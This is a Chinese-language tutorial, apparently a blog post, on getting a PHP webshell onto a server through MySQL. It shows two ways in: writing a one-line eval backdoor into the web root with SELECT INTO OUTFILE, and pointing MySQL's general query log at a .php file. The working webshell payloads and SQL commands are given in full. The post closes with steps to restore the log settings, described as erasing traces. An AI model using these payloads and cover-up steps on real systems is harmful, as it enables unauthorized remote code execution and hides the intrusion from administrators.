文章目录
一、select into outfile直接写入
1、利用条件
- 对web目录需要有写权限能够使用单引号(root)
- 知道网站绝对路径(phpinfo/php探针/通过报错等)
- secure_file_priv没有具体值
2、查看secure_file_priv值
show global variables like '%secure%';
关于secure_file_priv配置介绍:
secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限
当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权
secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,因为我们是自己测试,所以直接配置下就可以了。
是在MySQL的配置文件my.ini中进行配置:
3、写入一句话
select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'
这里注意路径分隔符要用"\\"
查看网站根目录下是否生成a.php,内容是否为一句话:
二、利用全局日志写shell
1、查看配置
查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销,所以千万不要在生产环境中开启这个功能!
show variables like '%general%';
2、开启general_log模式
开启general_log 的作用:开启它可以记录用户输入的每条命令,会把其保存在D:\phpStudy\PHPTutorial\MySQL\data\WIN-83V1721VG9V.log
的文件中,其实就是我们常说的日志文件
利用思路:开启general_log之后把general_log_file的值修改为该网站默认路径下的某一个自定义的php文件中,然后通过log日志进行写入一句话木马,然后再进一步利用。
这里注意:在修改log路径前,源路径一定要提前记录下来,我们获取shell后还要恢复原来的路径。
set global general_log = on;
3、修改日志目录为shell地址
set global general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\hp.php';
4、写入shell
因为开启了日志记录功能,所执行的sql语句都会被记录在日志中
select '<?php eval($_POST[cmd]);?>'
5、抹除痕迹
set global general_log_file='D:\phpStudy\PHPTutorial\MySQL\data\WIN-83V1721VG9V.log'; // 恢复原log文件路径
set global general_log = off; // 关闭全局日志